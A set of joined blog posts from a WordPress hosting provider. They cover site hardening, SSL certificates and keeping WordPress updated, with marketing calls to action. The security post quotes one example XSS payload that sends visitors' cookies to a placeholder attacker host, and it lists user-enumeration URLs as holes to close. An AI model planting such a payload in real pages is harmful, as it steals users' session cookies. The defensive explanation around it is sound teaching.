In August 2011, it was revealed that the popular script TimThumb was vulnerable to malicious exploits. TimThumb was and still is included in many popular WordPress plugins and themes. Within days we saw attackers using this vulnerability to their advantage, ranging from spamming WordPress sites with promotional material for other websites (SEO hijacking) to modifying PHP files that are stored on the server with random, meaningless characters at best, or even injecting other malicious code and exploits.

Most website owners didn’t realize that the script (and the malware) was running on their server and compromising their secure WordPress hosting. Some of them deactivated the problematic plugin or theme, but did not completely remove them. Deactivating the plugin or theme was meaningless and didn’t help at all, since the vulnerability remains as long as the problematic code exists on the server.

The Golden Rule for plugins and themes is if you’re not using a plugin or theme – delete it!

Block and prevent Bad Bots

Most hackers tend to send "spies" to check on a website before they start an attack. These are what we call "Bad Bots."

Bad Bots affect your website's performance, steal your content, occupy your valuable bandwidth, badly sabotage your website statistics, and most importantly, they look for security vulnerabilities in your secure WordPress hosting.

You can find a long list of bots that have been marked as "bad" at botreports.com. If you're using a security plugin or secure WordPress hosting service, you're probably already blocking the bots on this list.

uPress customers: There's a "block bad bots" toggle under the security tab in our management panel.

Understand the minimum requirements for a secure server

Your managed WordPress hosting service plays the most important part in securing your WordPress website, so it’s vital to find a secure WordPress hosting service.

A secure WordPress hosting company should:

• Closely monitor new and existing security threats around the web, taking extra measures to secure WordPress hosting servers.
• Be capable of withstanding a DDoS attack.
• Regularly maintain the core components of the server, frequently updating them to prevent any chance of security vulnerabilities.
• Offer a Disaster Recovery feature and a contingency plan, in case of an emergency.
• Support PHP version 7.2 and MySQL version 5.5 and up
• Completely separate between different users on a shared secure WordPress hosting service
• Run a built-in firewall, preferably WAF that offers options specifically for secure WordPress hosting, and a Network Intrusion Detection System that regularly scans website activity.
• Frequently scan websites on your secure WordPress hosting server and update you about them when necessary
• Enable you to track any file changes on your website.

Maintaining a secure WordPress site is an ongoing task

As you can see, setting up a secure WordPress site using secure WordPress hosting is important, but it's not enough to protect your website forever. Using a secure WordPress hosting service that meets certain requirements for a secure server goes a long way to helping you maintain your secure site, but you also need to take responsibility for keeping your WordPress version up to date and backed up, monitoring website activity, removing disused plugins and themes and blocking and preventing bad bots.

We hope you found this guide useful. Do you have anything to add, or want to give your own advice for securing a WordPress website? Or, if you have any questions about managed WordPress hosting in general, we'll be happy to hear from you!

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on backups, plugins, or security. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post The Complete WordPress Security Guide Part 2 appeared first on uPress.

Setting up and maintaining a secure WordPress site is a complex undertaking. When you're providing managed WordPress hosting services, your clients are relying on you to keep their website fully secure from hackers, malicious actors, and any security vulnerabilities.

Of course, you are welcome to review Part I and Part II of this series for all the tips in a comprehensive guide, but keep in mind that the first two installments are for a Non-Geek audience while this one is for web developers, so it's definitely solidly in the Geek category.

But you know that although WordPress core systems are highly secure, there are a lot of potential holes in plugins, themes, and updates that you need to close up, plus there's the ongoing risk that a user or WordPress admin could make changes that undermine all your hard work. Here are some of our tips for web developers, WordPress admin experts, and advanced programmers to build and maintain secure WordPress sites.

Note: This blog post is aimed at advanced WordPress developers and is written in Geek.

* This guide is aimed at WordPress websites hosted on a Linux server, but maybe relevant for a WordPress admin for sites hosted on Windows servers as well.

Disable the option to edit files from within the WordPress dashboard

By default, WordPress allows users to edit theme and plugin files through a dedicated code editor in the dashboard. In the wrong hands, this tool can be extremely dangerous and a massive security risk. An untrained but well-meaning WordPress admin could accidentally add arbitrary code to your plugin or theme, and that's why we recommend disabling this option completely.

It's far safer for a WordPress admin to edit code files only through an FTP client or a built-in file manager offered by your hosting provider.

To disable the option of editing the files through WordPress, add the following code to your website’s "wp-config.php" file. Make sure to add it above the lines /* That's all, stop editing! Happy blogging. */

define('DISALLOW_FILE_EDIT', true);

Migrate to uPress within 24 hours

Restrict access to the login/management areas

Hackers and malware try to access the wp-admin or wp-login.php areas of your website without any restrictions. If you control the firewall, we highly recommend restricting the access to these areas exclusively to the country you or your team are based in, or take it a step further and restrict it to certain IP addresses.

A WordPress admin can also protect these areas using a password on the server side that basically provides an extra layer of defense before the hacker/malware operator can access said areas. This is popular in Linux OS-based Apache servers.

Disable XML-RPC Protocol

The XML-RPC protocol is enabled by default in WordPress from version 3.5 and up to help remotely connect your WordPress website with other websites and services. Your WordPress admin might appreciate it, but it's a big security hole that can be used to attack your own or other websites.

For example, hackers or malware that try out 100 different passwords to access your account would have to make 100 separate attempts to login, giving your security systems the opportunity to recognize and block their attempts.

If XML-RPC is active, they can use the default-enabled function system.multicall to try thousands of different passwords in a far smaller number of attempts.

As a WordPress admin, you can limit the XML-RPC connection by:

• Blocking access to the xmlrpc.php file in your firewall or in your server configuration (eg. .htaccess or nginx.conf files).
• Installing a plugin like Disable XML-RPC, which is available for download through the official WordPress repository.

uPress Customers: there an XML-RPC toggle under the security tab which disables the protocol by default.

Apply a user protection program

By default, WordPress websites make it possible to access the user's post archive which lists all of their published posts. Bots can utilize this hole to read the user’s sensitive information by Brute Forcing their user-ID, like this:

https://www.domain.co.il/?author=1
https://www.domain.co.il/?author=2
https://www.domain.co.il/?author=3

We recommend that a WordPress admin blocks this path:

https://www.domain.co.il/?author=*

Another issue is that WordPress version 4.7 and up includes and enables Rest API by default, as part of the core WordPress components. The Rest API allows users to easily access information from a database on a remote server (e.g. a WordPress site) using HTTP, making it easier for hackers and malware operators who are trying to steal user information.

For example, following this URL:

https://www.domain.co.il/wp-json/wp/v2/users

generates an organized JSON output of all the users on your website and their information.

It's not possible to completely disable this feature, because part of it is used by WordPress and certain plugins like the new visual editor Gutenberg. Instead, we recommend your WordPress admin blocks sensitive paths that can be utilized by Rest API.

The WordPress admin can block it by:

• Using your firewall to block wp-json/wp/v2/users
• Using .htaccess or nginx.conf to block wp-json/wp/v2/users
• Using a plugin like Disable Rest API that allows you to block specific or all Rest API paths for non-logged-in users. The plugin is available for download from the official WordPress repository.

uPress customers: There’s a REST API toggle under the security tab.

Hide your WordPress version

WordPress automatically embeds a meta tag in your source code that contains information about the WordPress version you use.

<meta name="generator" content="WordPress 4.9.10">

This information is accessible to everyone, including hackers and malware. When they know which WordPress version your website is running, they can choose the best tactics to use against this specific version.

Older versions are more likely to have known security wormholes that malicious actors can exploit to enter your WordPress admin system. It's not surprising that hackers tend to look for sites with older versions of WordPress.

That's why we strongly recommend keeping WordPress up-to-date, but you should also hide your WordPress version by adding the following code to the functions.php file of your theme:

remove_action('wp_head', 'wp_generator');

Take care of XSS exploits

An XSS (Cross-Site Scripting) attack is when malicious scripts are injected into your website, usually as a script that runs alongside the browser, and are downloaded and run on visiting users' browsers.

For example, you could inject an XSS script by simply adding the script as a comment on a post, like this:

<script>window.location="http://attacker-website/?cookie="+document.cookie</script>

If your WordPress admin isn't prepared for XSS exploits, every user who enters the contaminated article will load the comment section and start the script running on their own browser. (A protected website will show the script in Plain Text.).

WordPress knows how to deal with XSS filled comments by default, using built-in filtering and sanitation features. XSS scripts can be injected in many other places, not just the comment section. They could be added to a search field, a contact form, etc.

The best way for a WordPress admin to protect a site from XSS exploits is by sanitizing the data before outputting the content.

Hide PHP errors

WordPress comes with an error reporting system as part of its core components. This is great for developers who want to debug coding errors in plugins or themes, but not so great for a WordPress admin who wants to secure a WordPress site, because it gives valuable information to hackers and malware operators to help them penetrate the site.

For example, a PHP error in WordPress would usually look like this:

PHP: syntax error , unexpected '^' in /wp-content/plugins/plugin.php on line 6

We recommend hiding PHP error messages by editing the wp-config.php file with the following code:

ini_set('display_errors','Off'); ini_set('error_reporting', E_ALL ); define('WordPress_DEBUG', false); define('WordPress_DEBUG_DISPLAY', false);

Reset file and folder permissions

Make sure WordPress admin permissions are set up according to official WordPress guidelines. A folder with a permission of 777 allows anyone to read and write files in the folder.

These are the recommended permissions for a WordPress website:

• wp-config.php: permission of 600
• All files: permission of 644 or 640
• All folders: permission of 750 or 755

* You can adjust the permissions of files and folders through an FTP client, and by using a Reset Permissions button on some hosting services.

uPress customers: There's a reset permissions button for all files and folders to WordPress' recommendation under Development → Additional Tools for Web Hosting.

Use Authentication keys

By default, WordPress installations come with a wp-config.php file that contains empty encryption. When you install WordPress, the system should generate authentication keys, also called security keys, to encrypt and decrypt the information stored on registered users' cookies, such as user name and password.

This is how authentication keys are set by default:

define('AUTH_KEY', 'put your unique phrase here');

define('SECURE_AUTH_KEY', 'put your unique phrase here');

define('LOGGED_IN_KEY', 'put your unique phrase here');

define('NONCE_KEY', 'put your unique phrase here');

define('AUTH_SALT', 'put your unique phrase here');

define('SECURE_AUTH_SALT', 'put your unique phrase here');

define('LOGGED_IN_SALT', 'put your unique phrase here');

define('NONCE_SALT', 'put your unique phrase here');

And this is how authentication keys should look:

define('AUTH_KEY', 'X<@vIF23>d~#%kYe^_>xhv~xUJ*ia*y+ALlJLGv7qFJe<EnpEwD:g~~&$}+DC5eF');

define('SECURE_AUTH_KEY', 'nA@GM?#u7v99Yk+8sM|+ZeF;]P74f`2v|z]{dKS|+cojC.w<&o4LeGvv-]$FWX4^');

define('LOGGED_IN_KEY', 'UNOk*x]$V_a]]vtKZM>`gs2Ht^O/`Rl|>EJzO9/*Y|)tJ2`&rg8FZ 5`l,67)`1U');

define('NONCE_KEY', 'pc-UFE^.+7?+vPD^,i& ^^R?+|I-q+7p>?d2*NZ|zUf|?e&v&?6iz-gF+~m*?(L=');

define('AUTH_SALT', '7n_U|q1kJ)s)8_#5sb! FY]l)Y!Eyyse85!/$G>qh(XbTYpefVxC_M/naQKhM#PL');

define('SECURE_AUTH_SALT', 'Mw^0=5J5:TWi;fl|*$l|i]f7Gyw-}1@-G5ZPc1atjhg@8v#&& ?1re#D!vtE:g&^');

define('LOGGED_IN_SALT', '~hZF}x2b&F^Q-WQK8^q>5pS!|6eT^<6z!WSNcv;Jd&8mY2T9M`:S Z ;OYGd[{$e');

define('NONCE_SALT', 'rH&yz6/_S0hXVnJOJ28?]EME!}s>V<%+<[e;FEl:d)t>+P%|atn+Ktq-lpk{+WIM');

If you don't have unique authentication keys configured in your wp-config.php file, we recommend that a WordPress admin creates them at the dedicated WordPress security keys generator and configures them into your wp-config.php.

Disable PHP files in folders

Tighten up website security by disabling the option of running PHP files in folders that do not require them. For example, the folder /wp-content/uploads/ isn't supposed to contain any PHP files.

Disabling this possibility effectively blocks hackers and malware from running PHP files containing security exploits that may exist in this folder.

You can use a .htaccess file to perform this block:

# .htaccess - Disable PHP Execution <Files *.php> Order Allow,Deny Deny from all </Files>

uPress customers: This option is an integral part of our management panel and is set to block by PHP files in the uploads directory by default.

Secure vital files

The wp-config.php file probably contains the most sensitive information about your website, including access credentials for your database and authentication keys and settings. As WordPress admin, you should block direct access to the file immediately.

This can be done using the .htaccsess file:

# .htaccess - Protect wp-config.php <Files wp-config.php> Order Allow,Deny Deny from all </Files>

uPress customers: This option is an integral part of our management panel and access to this file is blocked by default.

The WordPress admin should also secure the .htaccess file, which contains your website's server configuration. If you're using an Apache server, you'd usually protect it on the server level, but if that's not possible you can use the .htaccess file to protect itself:

# .htaccess - Protect .htaccess <Files ~ "^.*\.([Hh][Tt][Aa])"> Order Allow,Deny Deny from all Satisfy all </Files>

Securing a WordPress site requires constant vigilance

When you're a WordPress admin, you can never let down your guard (and we can say the same, as managed WordPress hosting experts - we can never let our own guard down, much less that of our clients!) We've shared some useful tips that can help make it easier and faster to secure a WordPress site, whether you’re offering managed WordPress hosting services, WordPress development, or ongoing WordPress support as a WordPress admin. Disabling and blocking as many open security holes as possible and keeping WordPress security patches updated are the most crucial steps in frustrating would-be hackers and malicious actors, but we could go on and on.

As managed WordPress hosting experts, we speak your language. We can geek out with you about comprehensive WordPress security, but we can also discuss XML-RPC Protocol, Rest API paths, and XSS exploits. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post The Complete WordPress Security Guide Part 3 appeared first on uPress.

Credit card fraud is distressingly common, and no one wants to be the one to suffer. These understandable concerns about fraud and theft make many people way of using their credit card to make purchases online, but when you're running a business website through eCommerce web hosting, you need to find ways to reassure people that it's safe to buy items from your site.

Fortunately, today's security solutions have kept up with advances in credit card fraud, and now there are a number of ways to increase security for eCommerce web hosting and encourage customers to carry out online transactions. As managed WordPress hosting experts, we know that one effective, easy, option is to use SSL certificates on your site.

What is SSL?

Because the owners of online businesses need secure eCommerce web hosting that protects customer information, standards were set up to secure data. The first was the Secure Sockets Layer Protocol, or SSL, which encrypted data streams so they couldn't be read by hackers. SSL (and its successor TLS) exists to encrypt data for security, not to save data as some people mistakenly think.

Over time, newer and more effective protocols were developed and SSL became deprecated. The Transport Layer Security (TLS) Protocol became the standard that was established for the transmission of secure information over the internet, but people tend to use SSL and TLS interchangeably to refer to secure data transmission over the internet.

Migrate to uPress within 24 hours

Why use a TLS/SSL certificate with your eCommerce web hosting?

When you apply an SSL certificate to your WordPress site on eCommerce web hosting, it turns your web address from http:// to https://. This change is one that customers already widely recognize as a sign that trust this website to keep their sensitive financial information secure.

When your eCommerce web hosting uses an SSL certificate, it encrypts all the sensitive information that travels through the internet. Information that’s been encrypted with an SSL key can only be decrypted and read by the server or domain that has the key, which means only legitimate, trusted sites that were designated to receive and read it.

This is immensely important because when information travels between computers and devices, there are malicious actors trying to hack into the information stream. If they succeed in hacking into unencrypted information, they can easily read everything in it, including credit card numbers, usernames, passwords, residential addresses, etc.

How does a TLS/SSL certificate work to secure sites using managed WordPress web hosting for eCommerce?

Both TLS and SSL certificates work in the same basic way, using the public key/private key principle:

• A public key sits between the server (i.e. your website) and the client (i.e. your customer), but the private key is only stored on the server side.
• When a request is sent to the server, the browser encrypts the data using the public key. This encryption can only be unlocked using the private key.
• When the server accepts the request, it verifies the information was received correctly and decrypts it by combining both the public and private keys before passing the information on to the application (e.g. your WordPress online store).

What is the Encryption Function?

The encryption function basically verifies that the client has connected to the correct server. It then creates a secure communication channel by encrypting information passed between the user and your website. The encryption function makes sure that all the data reaches your website, without any errors or disruptions. If there is a mistake, the server will request an automatic replay from the browser.

Why is encryption important for eCommerce-based managed WordPress hosting?

• Encryption prevents unauthorized entities from reading information passed between the client and the server, which is called a Man In The Middle Attack;
• Enables customers to buy goods and services using a credit card;
• Secures sensitive information that’s transferred online, like addresses, driver's license numbers, passport or identity numbers, bank account information, etc.;
• Google prioritizes sites with a TLS/SSL certificate and boosts them in its search engine rankings.

How to get a TLS/SSL certificate

We're happy to tell you that uPress allows you to install unlimited TLS/SSL certificates for no extra cost.

If you aren't a uPress Customer

Visit our Packages for Non-Geeks page to select the right managed WordPress web hosting package for your eCommerce needs, or reach out to us and ask us directly!

If you are a uPress customer

• Enter your Management Panel and look below the Security tab
• You'll see a category marked "TLS/SSL Certificate"
• Click "Send Certificate Request"

The uPress team will quickly and professionally add the TLS/SSL Certificate to your WordPress site on your eCommerce web hosting. You will be notified as soon as the installation process is complete.

SSL/TLS certificates are vital for a secure eCommerce site

Now you understand about the many benefits of a TLS/SSL certificate, the role of encryption, and how encryption works, you can steam ahead to add a TLS/SSL certificate to your WordPress site.

At uPress, it's our goal to provide all our customers with TLS/SSL certificates to make sure your managed WordPress hosting experience is more reliable and secure.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on using SSL certificates, what other preventative maintenance you need to perform, or you just want to know why your site is running slow. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post uPress Provides a Safer, More Secure Internet with SSL Certificates - at No Extra Cost appeared first on uPress.

Before the next WordPress update, we thought we'd share this post that explores the impact of new WordPress versions on your WordPress management plans.

First of all, a little WordPress management history.

Unlike most website hosting platforms, WordPress is a free content management system developed by an open community of programmers. WordPress management systems are constantly evolving, with new tweaks and improvements being added all the time.

Every WordPress management update fixes bugs, adds new features, responds to user feedback, and upgrades existing capabilities in order to stay up-to-date with changing standards of technology. That means that if you don’t update your WordPress site, you'll endanger its security and could miss out on new features.

Let's take a closer look at the pros and cons of WordPress management updates.

Migrate to uPress within 24 hours

Maintain security

Security is the most important reason why you should keep your WordPress site up-to-date. The popularity of WordPress management for all kinds of websites has made it into a magnet for hackers, malicious code distributors, thieves, and other bad actors. Approximately 23% of the world’s websites are based on WordPress.

On top of that, WordPress is an open source content management system. That means that the source code is publicly available so that anyone can study it and find ways to improve the platform, but it also means that hackers can study it for vulnerabilities that they can exploit to hack into WordPress sites.

Whenever security experts find a vulnerability or weakness, they report the bug, make quick fixes, and discuss ways to patch the weakness to keep hackers out. The vast majority of WordPress core updates are vital security updates that protect your site. They aren't something that's nice to have to make your WordPress management easier; they are vital patches that keep cyber thieves out of your website.

If you continue to use an out-of-date version of WordPress, you are vulnerable to attack. Hackers track and locate sites that are running on older versions of WordPress because they know these are easier targets.

Bear in mind that these updates don't apply only to the core WordPress management system, but also to all the plugins, themes, and templates that you use. You really need to keep each of these fully updated.

Access new features

There are loads of minor WordPress updates, but major ones only come a long every now and then and they always hold important new features and software changes. For example, WordPress 4.0 brought an enhanced plug-in experience; WordPress 4.1 introduced in-line image editing; WordPress 4.2 came with faster plug-in updates.

That means that if you are using an older WordPress version, your WordPress management will be very different, and probably much more difficult, than someone who updated their version promptly.

Improve performance

WordPress developers are constantly trying to improve site performance. Each new version comes with a number of changes that actually make WordPress work faster and more efficiently.

For example, WordPress 4.2 improved JavaScript performance for navigation menus, while WordPress 4.1 improved complex queries that helped sites that used the same queries. Since website speed is a crucial factor in SEO, we strongly recommend keeping your WordPress version updated.

Patch up bugs

Even though every version of WordPress is tested meticulously before it is released, there can still be small bugs that slip through unnoticed and they’re only found once the version is fully operational. That's why responsible WordPress management applies to even minor updates, which are updates numbered “X.X.X” like 4.2.1.

If you contact WordPress support about a problem with your WordPress management, the first question they'll ask will be about which WordPress version you’re using. Updating WordPress is usually enough to solve the issue.

The down side: Adjust for extensions and templates

The only possible downside to keeping your WordPress updated is that occasionally, it could cut off plugins, extensions, and templates that aren't using the best practices and coding standards. That's why you need to schedule frequent backups as part of your WordPress management, at least before each update. Sometimes you might also need to readjust your plugin settings after an update.

Keeping your site updated is best practice for WordPress management

Overall, the advantages that WordPress updates bring far outweigh the possible disadvantages. WordPress updates will increase security, fix bugs, improve site speed, and bring you new features. If you’d like to learn more about updating to the latest version of WordPress, check out Part II of this blog.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on updating themes, managing preventative security, or if you just need to figure out how to configure your time and date formats. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post Why is it important to use the latest version of WordPress? Part 1 appeared first on uPress.

As we discussed in a previous post, keeping your WordPress site updated is key to good WordPress site management, security, and performance. Now we’ll explain how to carry out the process of updating your WordPress site. 

Managed WordPress hosting updates for uPress customers

If you're already a uPress customer, then updating your WordPress site is easy. All you need to do is log in to your Admin panel and click on Choose your site » WordPress Tab » Automatic Update to WordPress, as shown in the image below.

Efficient WordPress site management is as simple as that.

Migrate to uPress within 24 hours

Handling WordPress updates for non-uPress customers

If you are not a uPress Customer, don't panic. There are several different ways to do this and they are all pretty simple. Or, you could switch over to our managed WordPress hosting packages listed right above by clicking one of those green buttons.

Use WordPress messages

There’s a messaging system built into your WordPress site management dashboard which notifies you about updates every time you log into your WordPress account. You'll see a red circle with a number inside it near the top of your left sidebar when you log in.

Click on the Updates tab in the sidebar and follow the on-screen instructions to install the updates listed.

Receive email notifications about WordPress updates

Alternatively, you can receive an email whenever there's a new update. You just need to install the WP Updates Notifier plugin from the plugin store, and follow the instructions to activate it.

Once it's installed and activated, go to "Updates Notifier" to put your email address in the extension settings. You can choose whether to receive emails about every update, or only about core updates, theme updates, or plugin updates, then click "Save settings," or "Save settings with test email."

If you don't receive a test email, contact our customer support.

Turn on Automatic Updates

If you're using WordPress 3.7 or higher, you can turn on automatic updates for minor releases that fix bugs and other safety issues. You can also permit automatic updates for larger releases, extensions, and topics.

Be aware, though, that allowing automatic updates can be dangerous for your WordPress site management if you don't have a Dedicated Managed Storage Server that monitors for any mishaps. If you always permit automatic updates without any backup, there's a risk that an update could damage your site. Without a recent backup, you won't be able to correct it.

There are two ways to enable automatic updates: using an extension, or with code.

Using a plugin to enable automatic updates

Go to the WordPress store to install and run the Easy Updates Manager add-on.

After activation, go to Control Panel » Updates to adjust the plugin settings.

You'll see that one of the options is Automatic Updates. Here, you can turn on Automatic Updates for core WordPress site management updates, extensions, themes, and translation files updates. Once you have finished, click Save settings.

Using code to enable automatic updates (wp-config.php file)

If you're confident about handling code as part of your WordPress site management, you can permit automatic updates on a code level.

1. Go to your WordPress menu and hover over "Appearance." In the menu that appears, click "Editor."
2. On the right-hand side of the screen, you'll see "functions.php" or "Theme functions." Click this to go to the code editor.
3. Copy the following line of code and paste it into the wp-config.php file.

define('WP_AUTO_UPDATE_CORE', true);

To turn on automatic updates for themes and plugins as well as for core WordPress site management updates, add these lines of code as well:

add_filter( 'auto_update_plugin', '__return_true' );

add_filter( 'auto_update_theme', '__return_true' );

That's all it takes! Hopefully, this article helped you feel in control of your WordPress site management updates.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on updating to a new version, you're debating how much bandwidth you really need, or you want the full lowdown on security. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post Why is it important to use the latest version of WordPress? Part 2 appeared first on uPress.